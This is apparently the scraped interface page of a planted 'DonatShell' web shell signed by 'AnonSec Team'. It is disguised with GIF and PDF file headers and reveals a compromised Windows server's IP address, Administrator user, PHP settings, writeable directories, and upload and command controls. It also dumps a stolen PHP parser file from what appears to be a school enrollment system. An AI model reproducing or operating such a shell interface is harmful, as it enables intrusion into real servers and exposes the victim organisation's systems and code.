GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Enrollment/parse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Enrollment/parse/parseDARS_48_c.phpinc
<?
// Admin/Enrollment/parse/parseDARS_48_c.phpinc
// Parse state 48
// Parse Ed Plan section.
// Searching for:
// ['CreditsInProgress']

#printVar("$index: \$f_DARSln",$f_DARSln); printVar('$f_DARSlnAsize',$f_DARSlnAsize); printVar('$f_DARSlnA',$f_DARSlnA);
#exit;

if ( !$f_error ) {
	if ( $f_DARSlnAsize >= 3 &&  ( $f_DARSlnA[2] == 'CREDITS' || $f_DARSlnA[2] == 'CREDIT' ) && is_numeric($f_DARSlnA[1]) ) {
		if ( !isset($f_DARS_has_required_credits) || $f_DARS_has_required_credits ) {
			$DARS['Section'][$sectionName]['CreditsInProgress'] = $f_DARSlnA[1];
		} else {
			if ( !isset($DARS['Section'][$sectionName]['CreditsInProgress']) ) $DARS['Section'][$sectionName]['CreditsInProgress'] = 0;
			$DARS['Section'][$sectionName]['CreditsInProgress'] += $f_DARSlnA[1];
		}
	} else {
		$f_error = 'This is not a properly formatted IN-PROG line.<span class=\"pv_fl\"> '.basename(__FILE__).':'.__LINE__.'</span>';
	}
	/* * /
	if ( $f_DARSlnAsize == 6 &&  ( $f_DARSlnA[4] == 'COURSES' || $f_DARSlnA[4] == 'COURSE' ) &&  $f_DARSlnA[5] == 'TAKEN' && is_numeric($f_DARSlnA[3]) ) {
		$DARS['Section'][$sectionName]['CoursesAdded'] = $f_DARSlnA[0];
	}
	/* */
}
?>

Anon7 - 2022
AnonSec Team